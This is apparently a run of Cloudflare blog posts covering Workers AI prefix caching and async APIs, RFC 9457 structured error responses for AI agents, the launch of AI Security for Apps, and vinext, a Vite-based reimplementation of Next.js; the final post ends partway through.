With multi-turn conversations, when you send a new prompt, the client sends all the previous prompts, tools, and context from the session to the model as well. The delta between consecutive requests is usually just a few new lines of input; all the other context has already gone through the prefill stage during a previous request. This is where prefix caching helps. Instead of doing prefill on the entire request, we can cache the input tensors from a previous request, and only do prefill on the new input tokens. This saves a lot of time and compute from the prefill stage, which means a faster Time to First Token (TTFT) and a higher Tokens Per Second (TPS) throughput as you’re not blocked on prefill.

Workers AI has always done prefix caching, but we are now surfacing cached tokens as a usage metric and offering a discount on cached tokens compared to input tokens. (Pricing can be found on the model page.) We also have new techniques for you to leverage in order to get a higher prefix cache hit rate, reducing your costs.

New session affinity header for higher cache hit rates

In order to route to the same model instance and take advantage of prefix caching, we use a new x-session-affinity header. When you send this header, you’ll improve your cache hit ratio, leading to more cached tokens and subsequently, faster TTFT, TPS, and lower inference costs.

You can pass the new header like below, with a unique string per session or per agent. Some clients like OpenCode implement this automatically out of the box. Our Agents SDK starter has already set up the wiring to do this for you, too.

curl -X POST \
"https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/moonshotai/kimi-k2.5" \
  -H "Authorization: Bearer {API_TOKEN}" \
  -H "Content-Type: application/json" \
  -H "x-session-affinity: ses_12345678" \
  -d '{
    "messages": [
      {
        "role": "system",
        "content": "You are a helpful assistant."
      },
      {
        "role": "user",
        "content": "What is prefix caching and why does it matter?"
      }
    ],
    "max_tokens": 2400,
    "stream": true
  }'

Redesigned async APIs

Serverless inference is really hard. With a pay-per-token business model, it’s cheaper on a single request basis because you don’t need to pay for entire GPUs to service your requests. But there’s a trade-off: you have to contend with other people’s traffic and capacity constraints, and there’s no strict guarantee that your request will be processed. This is not unique to Workers AI — it’s evidently the case across serverless model providers, given the frequent news reports of overloaded providers and service disruptions. While we always strive to serve your request and have built-in autoscaling and rebalancing, there are hard limitations (like hardware) that make this a challenge.

For volumes of requests that would exceed synchronous rate limits, you can submit batches of inferences to be completed asynchronously. We’re introducing a revamped Asynchronous API, which means that for asynchronous use cases, you won’t run into Out of Capacity errors and inference will execute durably at some point. Our async API looks more like flex processing than a batch API, where we process requests in the async queue as long as we have headroom in our model instances. With internal testing, our async requests usually execute within 5 minutes, but this will depend on what live traffic looks like. As we bring Kimi to the public, we will tune our scaling accordingly, but the async API is the best way to make sure you don’t run into capacity errors in durable workflows. This is perfect for use cases that are not real-time, such as code scanning agents or research agents.

Workers AI previously had an asynchronous API, but we’ve recently revamped the systems under the hood. We now rely on a pull-based system versus the historical push-based system, allowing us to pull in queued requests as soon as we have capacity. We’ve also added better controls to tune the throughput of async requests, monitoring GPU utilization in real-time and pulling in async requests when utilization is low, so that critical synchronous requests get priority while still processing asynchronous requests efficiently.

To use the asynchronous API, you would send your requests as seen below. We also have a way to set up event notifications so that you can know when the inference is complete instead of polling for the request.

// (1.) Push a request in queue
// pass queueRequest: true
let res = await env.AI.run("@cf/moonshotai/kimi-k2.5", {
  "requests": [{
    "messages": [{
      "role": "user",
      "content": "Tell me a joke"
    }]
  }, {
    "messages": [{
      "role": "user",
      "content": "Explain the Pythagoras theorem"
    }]
  }, ...{} ];
}, {
  queueRequest: true,
});


// (2.) grab the request id
let request_id;
if(res && res.request_id){
  request_id = res.request_id;
}
// (3.) poll the status
let res = await env.AI.run("@cf/moonshotai/kimi-k2.5", {
  request_id: request_id
});

if(res && res.status === "queued" || res.status === "running") {
 // retry by polling again
 ...
}
else 
 return Response.json(res); // This will contain the final completed response

Try it out today

Get started with Kimi K2.5 on Workers AI today. You can read our developer docs to find out model information and pricing, and how to take advantage of prompt caching via session affinity headers and asynchronous API. The Agents SDK starter also now uses Kimi K2.5 as its default model. You can also connect to Kimi K2.5 on Workers AI via Opencode. For a live demo, try it in our playground.

And if this set of problems around serverless inference, ML optimizations, and GPU infrastructure sound interesting to you — we’re hiring!

Slashing agent token costs by 98% with RFC 9457-compliant error responses

Sam Marsh — Wed, 11 Mar 2026 13:05:00 GMT

AI agents are no longer experiments. They are production infrastructure, making billions of HTTP requests per day, navigating the web, calling APIs, and orchestrating complex workflows.

But when these agents hit an error, they still receive the same HTML error pages we built for browsers: hundreds of lines of markup, CSS, and copy designed for human eyes. Those pages give agents clues, not instructions, and waste time and tokens. That gap is the opportunity to give agents instructions, not obstacles.

Starting today, Cloudflare returns RFC 9457-compliant structured Markdown and JSON error payloads to AI agents, replacing heavyweight HTML pages with machine-readable instructions.

That means when an agent sends Accept: text/markdown, Accept: application/json, or Accept: application/problem+json and encounters a Cloudflare error, we return one semantic contract in a structured format instead of HTML. And it comes complete with actionable guidance. (This builds on our recent Markdown for Agents release.)

So instead of being told only "You were blocked," the agent will read: "You were rate-limited — wait 30 seconds and retry with exponential backoff." Instead of just "Access denied," the agent will be instructed: "This block is intentional: do not retry, contact the site owner."

These responses are not just clearer — they are dramatically more efficient. Structured error responses cut payload size and token usage by more than 98% versus HTML, measured against a live 1015 ('rate-limit') error response. For agents that hit multiple errors in a workflow, the savings compound quickly.

This is live across the Cloudflare network, automatically. Site owners do not need to configure anything. Browsers keep getting the same HTML experience as before.

These are not just error pages. They are instructions for the agentic web.

What agents see today

When an agent receives a Cloudflare-generated error, it usually means Cloudflare is enforcing customer policy or returning a platform response on the customer's behalf — not that Cloudflare is down. These responses are triggered when a request cannot be served as-is, such as invalid host or DNS routing, customer-defined access controls (WAF, geo, ASN, or bot rules), or edge-enforced limits like rate limiting. In short, Cloudflare is acting as the customer's routing and security layer, and the response explains why the request was blocked or could not proceed.

Today, those responses are rendered as HTML designed for humans:




Access denied | example.com used Cloudflare to restrict access



  
    Sorry, you have been blocked

To an agent, this is garbage. It cannot determine what error occurred, why it was blocked, or whether retrying will help. Even if it parses the HTML, the content describes the error but doesn't tell the agent — or the human, for that matter — what to do next.

If you're an agent developer and you wanted to handle Cloudflare errors gracefully, your options were limited. For Cloudflare-generated errors, structured responses existed only in configuration-dependent paths, not as a consistent default for agents.

Custom Error Rules can customize many Cloudflare errors, including some 1xxx cases. But they depend on per-site configuration, so they cannot serve as a universal agent contract across the web. Cloudflare sits in front of the request path. That means we can define a default machine response: retry or stop, wait and back off, escalate or reroute. Error pages stop being decoration and become execution instructions.

What we did

Cloudflare now returns RFC 9457-compliant structured responses for all 1xxx-class error paths — Cloudflare's platform error codes for edge-side failures like DNS resolution issues, access denials, and rate limits. Both formats are live: Accept: text/markdown returns Markdown, Accept: application/json returns JSON, and Accept: application/problem+json returns JSON with the application/problem+json content type.

This covers all 1xxx-class errors today. The same contract will extend to Cloudflare-generated 4xx and 5xx errors next.

Markdown responses have two parts:

YAML frontmatter for machine-readable fields
prose sections for explicit guidance (What happened and What you should do)

JSON responses carry the same fields as a flat object.

The YAML frontmatter is the critical layer for automation. It lets an agent extract stable keys without scraping HTML or guessing intent from copy. Fields like error_code, error_name, and error_category let the agent classify the failure. retryable and retry_after drive backoff logic. owner_action_required tells the agent whether to keep trying or escalate. ray_id, timestamp, and zone make logs and support handoffs deterministic.

The schema is stable by design, so agents can implement durable control flow without chasing presentation changes.

That stability is not a Cloudflare invention. RFC 9457 — Problem Details for HTTP APIs defines a standard JSON shape for reporting errors over HTTP, so clients can parse error responses without knowing the specific API in advance. Our JSON responses follow this shape, which means any HTTP client that understands Problem Details can parse the base members without Cloudflare-specific code:

RFC 9457 member	What it contains
`type`	A URI pointing to Cloudflare's documentation for the specific error code
`status`	The HTTP status code (matching the actual response status)
`title`	A short, human-readable summary of the problem
`detail`	A human-readable explanation specific to this occurrence
`instance`	The Ray ID identifying this specific error occurrence

The operational fields — error_code, error_category, retryable, retry_after, owner_action_required, and more — are RFC 9457 extension members. Clients that don't recognize them simply ignore them.

This is network-wide and additive. Site owners do not need to configure anything. Browsers keep receiving HTML unless clients explicitly ask for Markdown or JSON.

What the response looks like

Here is what a rate-limit error (1015) looks like in JSON:

{
  "type": "https://developers.cloudflare.com/support/troubleshooting/http-status-codes/cloudflare-1xxx-errors/error-1015/",
  "title": "Error 1015: You are being rate limited",
  "status": 429,
  "detail": "You are being rate-limited by the website owner's configuration.",
  "instance": "9d99a4434fz2d168",
  "error_code": 1015,
  "error_name": "rate_limited",
  "error_category": "rate_limit",
  "ray_id": "9d99a4434fz2d168",
  "timestamp": "2026-03-09T11:11:55Z",
  "zone": "",
  "cloudflare_error": true,
  "retryable": true,
  "retry_after": 30,
  "owner_action_required": false,
  "what_you_should_do": "**Wait and retry.** This block is transient. Wait at least 30 seconds, then retry with exponential backoff.\n\nRecommended approach:\n1. Wait 30 seconds before your next request\n2. If rate-limited again, double the wait time (60s, 120s, etc.)\n3. If rate-limiting persists after 5 retries, stop and reassess your request pattern",
  "footer": "This error was generated by Cloudflare on behalf of the website owner."
}

The same error in Markdown, optimized for model-first workflows:

---
error_code: 1015
error_name: rate_limited
error_category: rate_limit
status: 429
ray_id: 9d99a39dc992d168
timestamp: 2026-03-09T11:11:28Z
zone: 
cloudflare_error: true
retryable: true
retry_after: 30
owner_action_required: false
---

# Error 1015: You are being rate limited

## What Happened

You are being rate-limited by the website owner's configuration.

## What You Should Do

**Wait and retry.** This block is transient. Wait at least 30 seconds, then retry with exponential backoff.

Recommended approach:
1. Wait 30 seconds before your next request
2. If rate-limited again, double the wait time (60s, 120s, etc.)
3. If rate-limiting persists after 5 retries, stop and reassess your request pattern

---
This error was generated by Cloudflare on behalf of the website owner.

Both formats give an agent everything it needs to decide and act: classify the error, choose retry behavior, and determine whether escalation is required. This is what a default machine contract looks like — not per-site configuration, but network-wide behavior. The contrast is explicit across error families: a transient error like 1015 says wait and retry, while intentional blocks like 1020 or geographic restrictions like 1009 tell the agent not to retry and to escalate instead.

One contract, two formats

The core value is not format choice. It is semantic stability.

Agents need deterministic answers to operational questions: retry or not, how long to wait, and whether to escalate. Cloudflare exposes one policy contract across two wire formats. Whether a client consumes Markdown or JSON, the operational meaning is identical: same error identity, same retry/backoff signals, same escalation guidance.

Clients that send Accept: application/problem+json get application/problem+json; charset=utf-8 back — useful for HTTP client libraries that dispatch on media type. Clients that send Accept: application/json get application/json; charset=utf-8 — same body, safe default for existing consumers.

Size reduction and token efficiency

That contract is also dramatically smaller than what it replaces. Cloudflare HTML error pages are browser-oriented and heavy, while structured responses are compact by design.

Measured comparison for 1015:

Payload	Bytes	Tokens (cl100k_base)	Size vs HTML	Token vs HTML
HTML response	46,645	14,252	—	—
Markdown response	798	221	58.5x less	64.5x less
JSON response	970	256	48.1x less	55.7x less

Both structured formats deliver a ~98% reduction in size and tokens versus HTML. For agents, size translates directly into token cost — when an agent hits multiple errors in one run, these savings compound into lower model spend and faster recovery loops.

Ten categories, clear actions

Every 1xxx error is mapped to an error_category. That turns error handling into routing logic instead of brittle per-page parsing.

Category	What it means	What the agent should do
`access_denied`	Intentional block: IP, ASN, geo, firewall rule	Do not retry. Contact site owner if unexpected.
`rate_limit`	Request rate exceeded	Back off. Retry after retry_after seconds.
`dns`	DNS resolution failure at the origin	Do not retry. Report to site owner.
`config`	Configuration error: CNAME, tunnel, host routing	Do not retry (usually). Report to site owner.
`tls`	TLS version or cipher mismatch	Fix TLS client settings. Do not retry as-is.
`legal`	DMCA or regulatory block	Do not retry. This is a legal restriction.
`worker`	Cloudflare Workers runtime error	Do not retry. Site owner must fix the script.
`rewrite`	Invalid URL rewrite output	Do not retry. Site owner must fix the rule.
`snippet`	Cloudflare Snippets error	Do not retry. Site owner must fix Snippets config.
`unsupported`	Unsupported method or deprecated feature	Change the request. Do not retry as-is.

Two fields make this operationally useful for agents:

retryable answers whether a retry can succeed
owner_action_required answers whether the problem must be escalated

You can replace brittle "if status == 429 then maybe retry" heuristics with explicit control flow. Parse the frontmatter once, then branch on stable fields. A simple pattern is:

if retryable is true, wait retry_after and retry
if owner_action_required is true, stop and escalate
otherwise, fail fast without hammering the site

Here is a minimal Python example using that pattern:

import time
import yaml


def parse_frontmatter(markdown_text: str) -> dict:
    # Expects: ---\n\n---\n
    if not markdown_text.startswith("---\n"):
        return {}
    _, yaml_block, _ = markdown_text.split("---\n", 2)
    return yaml.safe_load(yaml_block) or {}


def handle_cloudflare_error(markdown_text: str) -> str:
    meta = parse_frontmatter(markdown_text)

    if not meta.get("cloudflare_error"):
        return "not_cloudflare_error"

    if meta.get("retryable"):
        wait_seconds = int(meta.get("retry_after", 30))
        time.sleep(wait_seconds)
        return f"retry_after_{wait_seconds}s"

    if meta.get("owner_action_required"):
        return f"escalate_owner_error_{meta.get('error_code')}"

    return "do_not_retry"

This is the key shift: agents are no longer inferring intent from HTML copy. They are executing explicit policy from structured fields.

How to use it

Send Accept: text/markdown, Accept: application/json, or Accept: application/problem+json.

For quick testing, you can hit any Cloudflare-proxied domain directly at /cdn-cgi/error/1015 (or replace 1015 with another 1xxx code).

curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015"

Example with another error code:

curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1020"

JSON example:

curl -s --compressed -H "Accept: application/json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015" | jq .

RFC 9457 Problem Details example:

curl -s --compressed -H "Accept: application/problem+json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015" | jq .

The behavior is deterministic — the first explicit structured type wins:

Accept header	Response
`application/json`	JSON
`application/json; charset=utf-8`	JSON
`application/problem+json`	JSON (application/problem+json content type)
`application/json, text/markdown;q=0.9`	JSON
`application/json, text/markdown`	JSON (equal q, first-listed wins)
`text/markdown`	Markdown
`text/markdown, application/json`	Markdown (equal q, first-listed wins)
`text/markdown, /`	Markdown
`text/*`	Markdown
`/`	HTML (default)

Wildcard-only requests (*/*) do not signal a structured preference; clients must explicitly request Markdown or JSON.

If the request succeeds, you get normal origin content. The header only affects Cloudflare-generated error responses.

Real-world use cases

There are a number of situations where structured error responses help immediately:

Agent blocked by WAF rule (1020). The agent parses error_code, records ray_id, and stops retrying. It can escalate with useful context instead of looping.
MCP (Model Context Protocol) tool hitting geo restriction (1009). The tool gets a clear, machine-readable reason, returns it to the orchestrator, and the workflow can choose an alternate path or notify the user.
Rate-limited crawler (1015). The agent reads retryable: true and retry_after, applies backoff, and retries predictably instead of hammering the endpoint.
Developer debugging with curl. The developer can reproduce exactly what the agent sees, including frontmatter and guidance, without reverse-engineering HTML.
HTTP client libraries that understand RFC 9457. Any client that dispatches on application/problem+json or parses Problem Details objects can handle Cloudflare errors without Cloudflare-specific code.

In each case, the outcome is the same: less guessing, fewer wasted retries, lower model cost, and faster recovery.

Try it now

Send a structured Accept header and test against any Cloudflare-proxied domain:

curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015"

curl -s --compressed -H "Accept: application/json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015" | jq .

curl -s --compressed -H "Accept: application/problem+json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "/cdn-cgi/error/1015" | jq .

Error pages are the first conversation between Cloudflare and an agent. This launch makes that conversation structured, standards-compliant, and cheap to process.

To make this work across the web, agent runtimes should default to explicit structured Accept headers, not bare */*. Use Accept: text/markdown, */* for model-first workflows and Accept: application/json, */* for typed control flow. If you maintain an agent framework, SDK, or browser automation stack, ship this default and treat bare */* as legacy fallback.

And it is only the first layer. We are building the rest of the agent stack on top of it: AI Gateway for routing, controls, and observability; Workers AI for inference; and the identity, security, and access primitives agents will need to operate safely at Internet scale.

Cloudflare is helping our customers deliver content in agent-friendly ways, and this is just the start. If you're building or operating agents, start at agents.cloudflare.com.

AI Security for Apps is now generally available

Liam Reese — Wed, 11 Mar 2026 13:00:00 GMT

Cloudflare’s AI Security for Apps detects and mitigates threats to AI-powered applications. Today, we're announcing that it is generally available.

We’re shipping with new capabilities like detection for custom topics, and we're making AI endpoint discovery free for every Cloudflare customer—including those on Free, Pro, and Business plans—to give everyone visibility into where AI is deployed across their Internet-facing apps.

We're also announcing an expanded collaboration with IBM, which has chosen Cloudflare to deliver AI security to its cloud customers. And we’re partnering with Wiz to give mutual customers a unified view of their AI security posture.

A new kind of attack surface

Traditional web applications have defined operations: check a bank balance, make a transfer. You can write deterministic rules to secure those interactions.

AI-powered applications and agents are different. They accept natural language and generate unpredictable responses. There's no fixed set of operations to allow or deny, because the inputs and outputs are probabilistic. Attackers can manipulate large language models to take unauthorized actions or leak sensitive data. Prompt injection, sensitive information disclosure, and unbounded consumption are just a few of the risks cataloged in the OWASP Top 10 for LLM Applications.

These risks escalate as AI applications become agents. When an AI gains access to tool calls—processing refunds, modifying accounts, providing discounts, or accessing customer data—a single malicious prompt becomes an immediate security incident.

Customers tell us what they’re up against. "Most of Newfold Digital's teams are putting in their own Generative AI safeguards, but everybody is innovating so quickly that there are inevitably going to be some gaps eventually,” says Rick Radinger, Principal Systems Architect at Newfold Digital, which operates Bluehost, HostGator, and Domain.com.

What AI Security for Apps does

We built AI Security for Apps to address this. It sits in front of your AI-powered applications, whether you're using a third-party model or hosting your own, as part of Cloudflare's reverse proxy. It helps you (1) discover AI-powered apps across your web property, (2) detect malicious or off-policy behavior to those endpoints, and (3) mitigate threats via the familiar WAF rule builder.

Discovery — now free for everyone

Before you can protect your LLM-powered applications, you need to know where they're being used. We often hear from security teams who don’t have a complete picture of AI deployments across their apps, especially as the LLM market evolves and developers swap out models and providers.

AI Security for Apps automatically identifies LLM-powered endpoints across your web properties, regardless of where they’re hosted or what the model is. Starting today, this capability is free for every Cloudflare customer, including Free, Pro, and Business plans.

^{Cloudflare’s dashboard page of web assets, showing 2 example endpoints labelled as}^cf-llm

Discovering these endpoints automatically requires more than matching common path patterns like /chat/completions. Many AI-powered applications don't have a chat interface: think product search, property valuation tools, or recommendation engines. We built a detection system that looks at how endpoints behave, not what they're called. To confidently identify AI-powered endpoints, sufficient valid traffic is required.

AI-powered endpoints that have been discovered will be visible under Security → Web Assets, labeled as cf-llm. For customers on a Free plan, endpoint discovery is initiated when you first navigate to the Discovery page. For customers on a paid plan, discovery occurs automatically in the background on a recurring basis. If your AI-powered endpoints have been discovered, you can review them immediately.

Detection

AI Security for Apps detections follow the always-on approach for traffic to your AI-powered endpoints. Each prompt is run through multiple detection modules for prompt injection, PII exposure, and sensitive or toxic topics. The results—whether the prompt was malicious or not—are attached as metadata you can use in custom WAF rules to enforce your policies. We are continuously exploring ways to leverage our global network, which sees traffic from roughly 20% of the web, to identify new attack patterns across millions of sites before they reach yours.

New in GA: Custom topics detection

The product ships with built-in detection for common threats: prompt injections, PII extraction, and toxic topics. But every business has its own definition of what's off-limits. A financial services company might need to detect discussions of specific securities. A healthcare company might need to flag conversations that touch on patient data. A retailer might want to know when customers are asking about competitor products.

The new custom topics feature lets you define these categories. You specify the topic, we inspect the prompt and output a relevance score that you can use to log, block, or handle however you decide. Our goal is to build an extensible tool that flexes to your use cases.

^{Prompt relevance score inside of AI Security for Apps}

New in GA: Custom prompt extraction

AI Security for Apps enforces guardrails before unsafe prompts can reach your infrastructure. To run detections accurately and provide real-time protection, we first need to identify the prompt within the request payload. Prompts can live anywhere in a request body, and different LLM providers structure their APIs differently. OpenAI and most providers use $.messages[*].content for chat completions. Anthropic's batch API nests prompts inside $.requests[*].params.messages[*].content. Your custom property valuation tool might use $.property_description.

Out of the box, we support the standard formats used by OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, and others. When we can't match a known pattern, we apply a default-secure posture and run detection on the entire request body. This can introduce false positives when the payload contains fields that are sensitive but don't feed directly to an AI model, for example, a $.customer_name field alongside the actual prompt might trigger PII detection unnecessarily.

Soon, you'll be able to define your own JSONPath expressions to tell us exactly where to find the prompt. This will reduce false positives and lead to more accurate detections. We're also building a prompt-learning capability that will automatically adapt to your application's structure over time.

Mitigation

Once a threat is identified and scored, you can block it, log it, or deliver custom responses, using the same WAF rules engine you already use for the rest of your application security. The power of Cloudflare’s shared platform is that you can combine AI-specific signals with everything else we know about a request, represented by hundreds of fields available in the WAF. A prompt injection attempt is suspicious. A prompt injection attempt from an IP that’s been probing your login page, using a browser fingerprint associated with previous attacks, and rotating through a botnet is a different story. Point solutions that only see the AI layer can’t make these connections.

This unified security layer is exactly what they need at Newfold Digital to discover, label, and protect AI endpoints, says Radinger: “We look forward to using it across all these projects to serve as a fail-safe."

Growing ecosystem

AI Security for Applications will also be available through Cloudflare's growing ecosystem, including through integration with IBM Cloud. Through IBM Cloud Internet Services (CIS), end users can already procure advanced application security solutions and manage them directly through their IBM Cloud account.

We're also partnering with Wiz to connect AI Security for Applications with Wiz AI Security, giving mutual customers a unified view of their AI security posture, from model and agent discovery in the cloud to application-layer guardrails at the edge.

How to get started

AI Security for Apps is available now for Cloudflare’s Enterprise customers. Contact your account team to get started, or see the product in action with a self-guided tour.

If you're on a Free, Pro, or Business plan, you can use AI endpoint discovery today. Log in to your dashboard and navigate to Security → Web Assets to see which endpoints we've identified. Keep an eye out — we plan to make all AI Security for Apps capabilities available for customers on all plans soon.

For configuration details, see our documentation.

How we rebuilt Next.js with AI in one week

Steve Faulkner — Tue, 24 Feb 2026 20:00:00 GMT

_{*This post was updated at 12:35 pm PT to fix a typo in the build time benchmarks.}

Last week, one engineer and an AI model rebuilt the most popular front-end framework from scratch. The result, vinext (pronounced "vee-next"), is a drop-in replacement for Next.js, built on Vite, that deploys to Cloudflare Workers with a single command. In early benchmarks, it builds production apps up to 4x faster and produces client bundles up to 57% smaller. And we already have customers running it in production.

The whole thing cost about $1,100 in tokens.

The Next.js deployment problem

Next.js is the most popular React framework. Millions of developers use it. It powers a huge chunk of the production web, and for good reason. The developer experience is top-notch.

But Next.js has a deployment problem when used in the broader serverless ecosystem. The tooling is entirely bespoke: Next.js has invested heavily in Turbopack but if you want to deploy it to Cloudflare, Netlify, or AWS Lambda, you have to take that build output and reshape it into something the target platform can actually run.

If you’re thinking: “Isn’t that what OpenNext does?”, you are correct.

That is indeed the problem OpenNext was built to solve. And a lot of engineering effort has gone into OpenNext from multiple providers, including us at Cloudflare. It works, but quickly runs into limitations and becomes a game of whack-a-mole.

Building on top of Next.js output as a foundation has proven to be a difficult and fragile approach. Because OpenNext has to reverse-engineer Next.js's build output, this results in unpredictable changes between versions that take a lot of work to correct.

Next.js has been working on a first-class adapters API, and we've been collaborating with them on it. It's still an early effort but even with adapters, you're still building on the bespoke Turbopack toolchain. And adapters only cover build and deploy. During development, next dev runs exclusively in Node.js with no way to plug in a different runtime. If your application uses platform-specific APIs like Durable Objects, KV, or AI bindings, you can't test that code in dev without workarounds.

Introducing vinext

What if instead of adapting Next.js output, we reimplemented the Next.js API surface on Vite directly? Vite is the build tool used by most of the front-end ecosystem outside of Next.js, powering frameworks like Astro, SvelteKit, Nuxt, and Remix. A clean reimplementation, not merely a wrapper or adapter. We honestly didn't think it would work. But it’s 2026, and the cost of building software has completely changed.

We got a lot further than we expected.

npm install vinext

Replace next with vinext in your scripts and everything else stays the same. Your existing app/, pages/, and next.config.js work as-is.

vinext dev          # Development server with HMR
vinext build        # Production build
vinext deploy       # Build and deploy to Cloudflare Workers

This is not a wrapper around Next.js and Turbopack output. It's an alternative implementation of the API surface: routing, server rendering, React Server Components, server actions, caching, middleware. All of it built on top of Vite as a plugin. Most importantly Vite output runs on any platform thanks to the Vite Environment API.

The numbers

Early benchmarks are promising. We compared vinext against Next.js 16 using a shared 33-route App Router application. Both frameworks are doing the same work: compiling, bundling, and preparing server-rendered routes. We disabled TypeScript type checking and ESLint in Next.js's build (Vite doesn't run these during builds), and used force-dynamic so Next.js doesn't spend extra time pre-rendering static routes, which would unfairly slow down its numbers. The goal was to measure only bundler and compilation speed, nothing else. Benchmarks run on GitHub CI on every merge to main.

Production build time:

Framework	Mean	vs Next.js
Next.js 16.1.6 (Turbopack)	7.38s	baseline
vinext (Vite 7 / Rollup)	4.64s	1.6x faster
vinext (Vite 8 / Rolldown)	1.67s	4.4x faster

Client bundle size (gzipped):

Framework	Gzipped	vs Next.js
Next.js 16.1.6	168.9 KB	baseline
vinext (Rollup)	74.0 KB	56% smaller
vinext (Rolldown)	72.9 KB	57% smaller

These benchmarks measure compilation and bundling speed, not production serving performance. The test fixture is a single 33-route app, not a representative sample of all production applications. We expect these numbers to evolve as three projects continue to develop. The full methodology and historical results are public. Take them as directional, not definitive.

The direction is encouraging, though. Vite's architecture, and especially Rolldown (the Rust-based bundler coming in Vite 8), has structural advantages for build performance that show up clearly here.

Deploying to Cloudflare Workers

vinext is built with Cloudflare Workers as the first deployment target. A single command takes you from source code to a running Worker:

vinext deploy

This handles everything: builds the application, auto-generates the Worker configuration, and deploys. Both the App Router and Pages Router work on Workers, with full client-side hydration, interactive components, client-side navigation, React state.

For production caching, vinext includes a Cloudflare KV cache handler that gives you ISR (Incremental Static Regeneration) out of the box:

import { KVCacheHandler } from "vinext/cloudflare";
import { setCacheHandler } from "next/cache";

setCacheHandler(new KVCacheHandler(env.MY_KV_NAMESPACE));

KV is a good default for most applications, but the caching layer is designed to be pluggable. That setCacheHandler call means you can swap in whatever backend makes sense. R2 might be a better fit for apps with large cached payloads or different access patterns. We're also working on improvements to our Cache API that should provide a strong caching layer with less configuration. The goal is flexibility: pick the caching strategy that fits your app.

Live examples running right now:

We also have a live example of Cloudflare Agents running in a Next.js app, without the need for workarounds like getPlatformProxy, since the entire app now runs in workerd, during both dev and deploy phases. This means being able to use Durable Objects, AI bindings, and every other Cloudflare-specific service without compromise. Have a look here.

Frameworks are a team sport

The current deployment target is Cloudflare Workers, but that's a small part of the picture. Something like 95% of vinext is pure Vite. The routing, the module shims, the SSR pipeline, the RSC integration: none of it is Cloudflare-specific.

Cloudflare is looking to work with other hosting providers about adopting this toolchain for their customers (the lift is minimal — we got a proof-of-concept working on Vercel in less than 30 minutes!). This is an open-source project, and for its long term success, we believe it’s important we work with partners across the ecosystem to ensure ongoing investment. PRs from other platforms are welcome. If you're interested in adding a deployment target, open an issue or reach out.

Status: Experimental

We want to be clear: vinext is experimental. It's not even one week old, and it has not yet been battle-tested with any meaningful traffic at scale. If you're evaluating it for a production application, proceed with appropriate caution.

That said, the test suite is extensive: over 1,700 Vitest tests and 380 Playwright E2E tests, including tests ported directly from the Next.js test suite and OpenNext's Cloudflare conformance suite. We’ve verified it against the Next.js App Router Playground. Coverage sits at 94% of the Next.js 16 API surface. Early results from real-world customers are encouraging. We've been working with National Design Studio, a team that's aiming to modernize every government interface, on one of their beta sites, CIO.gov. They're already running vinext in production, with meaningful improvements in build times and bundle sizes.

The README is honest about what's not supported and won't be, and about known limitations. We want to be upfront rather than overpromise.

What about pre-rendering?

vinext already supports Incremental Static Regeneration (ISR) out of the box. After the first request to any page, it's cached and revalidated in the background, just like Next.js. That part works today.

vinext does not yet support static pre-rendering at build time. In Next.js, pages without dynamic data get rendered during next build and served as static HTML. If you have dynamic routes, you use generateStaticParams() to enumerate which pages to build ahead of time. vinext doesn't do that… yet.

This was an intentional design decision for launch. It's on the roadmap, but if your site is 100% prebuilt HTML with static content, you probably won't see much benefit from vinext today. That said, if one engineer can spend $1,100 in tokens and rebuild Next.js, you can probably spend $10 and migrate to a Vite-based framework designed specifically for static content, like Astro (which also deploys to Cloudflare Workers).

For sites that aren't purely static, though, we think we can do something better than pre-rendering everything at build time.

Introducing Traffic-aware Pre-Rendering

Next.js pre-renders every page listed in generateStaticParams() during the build. A site with 10,000 product pages means 10,000 renders at build time, even though 99% of those pages may never receive a request. Builds scale linearly with page count. This is why large Next.js sites end up with 30-minute builds.

So we built Traffic-aware Pre-Rendering (TPR). It's experimental today, and we plan to make it the default once we have more real-world testing behind it.

The idea is simple. Cloudflare is already the reverse proxy for your site. We have your traffic data. We know which pages actually get visited. So instead of pre-rendering everything or pre-rendering nothing, vinext queries Cloudflare's zone analytics at deploy time and pre-renders only the pages that matter.

vinext deploy --experimental-tpr

  Building...
  Build complete (4.2s)

  TPR (experimental): Analyzing traffic for my-store.com (last 24h)
  TPR: 12,847 unique paths — 184 pages cover 90% of traffic
  TPR: Pre-rendering 184 pages...
  TPR: Pre-rendered 184 pages in 8.3s → KV cache

  Deploying to Cloudflare Workers...

For a site with 100,000 product pages, the power law means 90% of traffic usually goes to 50 to 200 pages. Those get pre-rendered in seconds. Everything else falls back to on-demand SSR and gets cached via ISR after the first request. Every new deploy refreshes the set based on current traffic patterns. Pages that go viral get picked up automatically. All of this works without generateStaticParams() and without coupling your build to your production database.

Taking on the Next.js challenge, but this time with AI

A project like this would normally take a team of engineers months, if not years. Several teams at various companies have attempted it, and the scope is just enormous. We tried once at Cloudflare! Two routers, 33+ module shims, server rendering pipelines, RSC streaming, file-system routing, middleware, caching, static export. There's a reason nobody has pulled it off.

This time we did it in under a week. One engineer (technically engineering manager) directing AI.

The first commit landed on February 13. By the end of that same evening, both the Pages Router and App Router had basic SSR working, along with middleware, server actions, and streaming. By the next afternoon, App Router Playground was rendering 10 of 11 routes. By day three, vinext deploy was shipping apps to Cloudflare Workers with full client hydration. The rest of the week was hardening: fixing edge cases, expanding the test suite, bringing API coverage to 94%.

What changed from those earlier attempts? AI got better. Way better.

Why this problem is made for AI

Not every project would go this way. This one did because a few things happened to line up at the right time.

Next.js is well-specified. It has extensive documentation, a massive user base, and years of Stack Overflow answers and tutorials. The API surface is all over the training data. When you ask Claude to implement getServerSideProps or explain how useRouter works, it doesn't hallucinate. It knows how Next works.

Next.js has an elaborate test suite. The Next.js repo contains thousands of E2E tests covering every feature and edge case. We ported tests directly from their suite (you can see the attribution in the code). This gave us a specification we could verify against mechanically.

